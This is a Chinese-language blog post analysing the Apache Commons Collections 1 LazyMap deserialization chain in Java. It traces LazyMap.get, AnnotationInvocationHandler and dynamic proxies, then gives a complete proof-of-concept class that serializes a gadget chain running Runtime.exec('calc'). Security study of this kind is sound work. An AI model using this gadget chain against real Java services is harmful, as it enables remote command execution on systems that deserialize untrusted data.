Java 反序列化漏洞-Apache Commons Collections1-LazyMap 攻击链

最新推荐文章于 2024-07-24 09:33:30 发布
最新推荐文章于 2024-07-24 09:33:30 发布
阅读量3.4k 收藏
点赞数
分类专栏: web学习 Java 文章标签: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/122823298
版权

Java 反序列化漏洞-Apache Commons Collections1-LazyMap 攻击链

前言

前面分析完了CC1的TransformedMap攻击链,但考虑到篇幅太大不利于查看,所以单独再写一篇CC1的LazyMap攻击链

漏洞挖掘

本地弹出POC

这条链前面的挖掘就不说了,挖掘过程可以看看上一篇文章
在这里插入图片描述
现在我们需要找到一个地方可以自动调用transform()方法

接下来我们看看lazymap的get方法
在这里插入图片描述
可以看到get方法里面调用了transform方法,get() 方法获取不到 key 的时候触发 transform,所以我们构造时就不放key了。接下来看看factory是否可控
在这里插入图片描述
通过构造函数我们可以看到factory可控,于是乎按照构造函数的规则进行构造并调用get方法
在这里插入图片描述

成功弹出计算器,但这只能在本地使用并不是我们想要的

AnnotationInvocationHandler.invoke()

在这里插入图片描述
invoke()方法里调用了get()方法,现在我们需要了解下前面的this.memberValues是否可控,如果可控那就可以传入上面的POC
在这里插入图片描述
通过AnnotationInvocationHandler的构造函数我们发现其可控

但这还远远不行,因为前面还有一堆的代码,我们希望前面的代码能顺利运行到这里,所以我们先看看前面的代码叭
在这里插入图片描述
invoke()方法会根据传入参数,先获取调用方法名和调用参数,然后需要我们调用的方法不能是equals且调用方法是无参的。然后因为下面switch(var7)我们要让他default,所以var7我们要保持它的值是-1,所以我们传入的方法也不能是toString,hashCode,annotationType。

接下来我们需要到readobject去找一下有没有调用一些满足条件的无参方法,这样反序列化时配合动态代理机制可以自动跳到这里

这里我们要补充一个知识点叫做Java动态代理,java.lang.reflect.InvocationHandler是Java动态代理中非常重要的一个类,其中Object invoke(Object proxy, Method method, Object[] args) 定义了代理对象调用方法时希望执行的动作,用于集中处理在动态代理类对象上的方法调用。总结起来的一句话就是被动态代理的对象调用任意方法都会调用对应的InvocationHandler 的 invoke 方法。

正好这里是在AnnotationInvocationHandler.invoke(),那我们可以用动态代理机制进入invoke()方法。

AnnotationInvocationHandler.readObject()

在这里插入图片描述
通过阅读代码我们可以看到readObject方法不需要做什么处理就会调用一个无参方法entrySet(),那我们只要控制this.memberValues为我们的动态代理实例对象就可以进入invoke方法了
在这里插入图片描述
进入动态代理实例的invoke方法后,我们看到this.memberValues调用了get方法,根据上面的POC,我们要让lazymap调用get方法,所以我们控制this.memberValues为lazymap即可,完整POC如下

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class ChainedTransformertest {
    public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {

        // 结合 ChainedTransformer
        ChainedTransformer chain = new ChainedTransformer(new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        });
        
        Map lazyMap = LazyMap.decorate(new HashMap(), chain);
        Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> constructor = c.getDeclaredConstructors()[0];
        constructor.setAccessible(true);

        // 创建携带着 LazyMap 的 AnnotationInvocationHandler 实例
        InvocationHandler handler = (InvocationHandler) constructor.newInstance(Target.class, lazyMap);
        // 创建LazyMap的动态代理类实例
        Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), LazyMap.class.getInterfaces(), handler);

        // 使用动态代理初始化 AnnotationInvocationHandler
        InvocationHandler invocationHandler = (InvocationHandler) constructor.newInstance(Target.class, mapProxy);

        ByteArrayOutputStream exp=new ByteArrayOutputStream();
        ObjectOutputStream oos=new ObjectOutputStream(exp);
        oos.writeObject(invocationHandler);
        oos.flush();
        oos.close();
        ByteArrayInputStream out=new ByteArrayInputStream(exp.toByteArray());
        ObjectInputStream ois=new ObjectInputStream(out);
        Object obj=(Object) ois.readObject();
    }
}

最后借用ysoserial的顺序图来说明流程
在这里插入图片描述

参考文章

https://su18.org/post/ysoserial-su18-2/#%E6%94%BB%E5%87%BB%E6%9E%84%E9%80%A0

lmonstergg
关注
专栏目录
javaJavacommons-collections反序列化漏洞
九师兄
07-19 79
Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。影响组件版本:
反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-14 1377
Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发Commons Collections 实现了一个TransformedMap类,该类是对Java标准数据结构Map接口的一个扩展。
CommonsBeanutils1反序列化在Shiro中的利用
12-04 995
CommonsBeanutils1反序列化在Shiro中的利用 前面分析Shiro550的时候,利用的是commons-collections进行构造反序列化,但是commons-collections是我们手动加进去的,如果Shiro没有commons-collections呢,这时候该怎么办?这时候CommonsBeanutils1反序列化就派上用场了! Shiro是默认依赖Commons-Beanutils1.8.3的,那么就可以利用CommonsBeanutils1反序列化进行构造pa
java反序列化CC1分析(LazyMap)
wsitcj的博客
03-17 1014
LazyMapLazyMap.decorate //factory成员数据类型为Transformer并且我们可以控制,且该方法为public访问权限 protected final Transformer factory; public static Map decorate(Map map, Transformer factory) { return new LazyMap(map, factory); } LazyMap.get 该方法中的factory属性调
java反序列化漏洞学习-apachecommonscollections
最新发布
ABUG
07-24 1518
这是本地执行的结果,服务端不会有人这样写代码,特别是**transform(Runtime.getRuntime())**这样的东西,因此,当下任务是找到可以代替Runtime.getRuntime()这样写法的利用。带还是同一个问题,这代码是在本地执行的,我们需要的是找到一个被重写的readObject()方法,可以帮我们执行transform方法。参考通过反射进行命令执行的方法,我们只要对以下三个参数可控,即可通过反射进行命令执行。这样,我们可以利用该类来执行命令。剩下的,我们要找到一个能够帮我们。
Java代码审计——Commons Collections LazyMap调用
王嘟嘟的博客
11-09 983
0x00 前言 CC迭代Java代码审计——Commons Collections 迭代调用 除开:Java审计——Commons Collections TransformedMap调用,还有一条LazyMap调用可以利用。 0x01 LazyMap调用 在CC包中,除了TransformedMap之外,还有一个LazyMap也可以去触发迭代触发的方式是通过get的方式进行触发。 同样和TransformedMap一样,基础的赋值也是由decorate完成的。 1. 先上POC Tr
java lazymap_java反序列化-ysoserial-调试分析总结篇(7)
weixin_33887804的博客
02-28 349
前言:CommonsCollections7外层也是一条新的构造,外层由hashtable的readObject进入,这条构造挺有意思,因为用到了hash碰撞yso构造分析:首先构造进行rce所需要的转换,这里也用的是chianed里面套Constantrans+invoketrans的方法接着构造两个hashmap,通过lazymap的decorate用chained进行装饰后放进hash...
java反序列化CC1 Transformmap攻击--2022最新
weixin_49248030的博客
10-28 1088
java反序列化CC1 Transformmap攻击逆向反推,Java反序列化,CC1分析
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3700
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
Java反序列化漏洞探析及其修复方法研究.pdf
07-02
Java反序列化漏洞是一种在信息安全领域引起广泛关注的新型高危漏洞,其最早在2015年被曝出,存在于Apache Commons Collections等公共库中。Java反序列化漏洞主要影响基于Java编写的各类应用程序,由于其能够远程执行...
Java反序列化漏洞Apache CommonsCollections分析
洋洋的小黑屋
05-17 522
Java反序列化漏洞Apache CommonsCollections分析 cc,既为Commons-Collections利用。此篇文章为cc的第一条CC1。而CC1目前用的比较多的有两条LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap,而我们此篇分析的则是TransformedMap。 1.本文所需前置知识 java反序列化基础...
commons-collectionsLazyMap
在这个数字革命的时代,我们将引领您穿越去中心化、智能合约、加密货币以及分布式应用程序的世界。无论您是初学者还是经验丰富的区块链开发者,我们都致力于为您提供有价值的信息和见解。
09-05 832
commons-collectionsLazyMap 作用:只有真正调用的时候才去加载 注:关注 public V get(final Object key) 方法 内部实现:通过 Transformer<? super K, ? extends V> factory; 映射key到value,通过key查找的时候,如果有就直接返回value,如果没有就会调用Transf...
Java 反序列化原理与基础,URLDNS攻击分析
weixin_49248030的博客
11-03 742
​ 序列化是指将对象转化为字节流,其目的是便于对象在内存、文件、数据库或者网络之间传递。反序列化则是序列化的逆过程,即字节流转化为对象的过程,通常是程序将内存、文件、数据库或者网络传递的字节流还原成对象。在 Java 原生的API 中,序列化的过程由 ObjectOutputStream 类的 writeObject()方法实现,反序列化过程由 ObjectInputStream 类的 readObject()方法实现。
Java代码审计-CC1 LazyMap Chains
Love&Share
01-16 2726
lazyMap chains LazyMap 和 TransformedMap 类似,都来自于 Common-Collections 库,并继承 AbstractMapDecorator LazyMap漏洞触发点和 TransformedMap 唯一的差别是,TransformedMap 是在写入元素的时候执行 transform,而 LazyMap 是在其 get 方法中执行的 factory.transform 。其实这也好理解,LazyMap 的作用是“懒加载”,在 get 找不到值的时候,它.
cc1LazyMap
weixin_45682070的博客
01-09 952
前言 上一篇文章我们看了Java动态代理的概念,而cc1中的LazyMap用到这个概念,现在来做个简单的剖析。 简而言之就是当调用到被代理对象的任何方法时,都会先调用InvocationHandler接口中的invoke方法,而AnnotationInvocationHandler正好实现了该接口。 LazyMap 首先我们先看一下代码: package org.example.cc; import org.apache.commons.collections.Transformer; import
java lazymap_java – flatMap是否保证是懒惰的?
weixin_30086969的博客
02-28 115
参见英文答案 > Why filter() after flatMap() is “not completely” lazy in Java streams?????????????????????????????????????6个请考虑以下代码:urls.stream().flatMap(url -> fetchDataFromInternet(url).stream()).fil...
java lazymap_java apache-commons-collectionsMap辅助类的使用
weixin_42136365的博客
02-28 154
前言apache-commons-collectionsMap辅助类,很是有用。尽管我们通过原生Map经过业务逻辑处理也能达到相同的作用与效果,但毕竟作为一个开源的工具类辅助类,对它有个了解还是有必要的。maven依赖org.apache.commonscommons-collections44.0LazyMapLazyMap,意思就是这个Map中的键/值对一开始并不存在,当被调用到时才创建,如...
[Java反序列化]CommonsCollections1利用学习(下)
feng的博客
08-14 449
前言 白天学习了CommonsCollections1的TransformedMap,感觉打开了新世界的大门,所以晚上学习了LazyMap,感觉也没那么难理解,可能是因为我在看CC之前已经把基础知识都给过了一遍叭,所以才没那么困难。 环境 <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>com
[Java安全]ysoserial_CommonCollections1_LazyMap
cosmoslin的博客
03-12 3622
ysoserial_CommonCollections1_LazyMap 本文分析yso中的利用 本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 3.1 import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collection
修复Java反序列化漏洞:Weblogic 10.3.6补丁更新指南
"weblogic10.3.6补丁更新是针对Java反序列化漏洞的修复过程,涉及Apache Commons Collections库,该漏洞允许攻击者远程执行操作系统命令,影响包括WebLogic在内的多个主流中间件。Oracle官方提供了补丁下载,补丁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值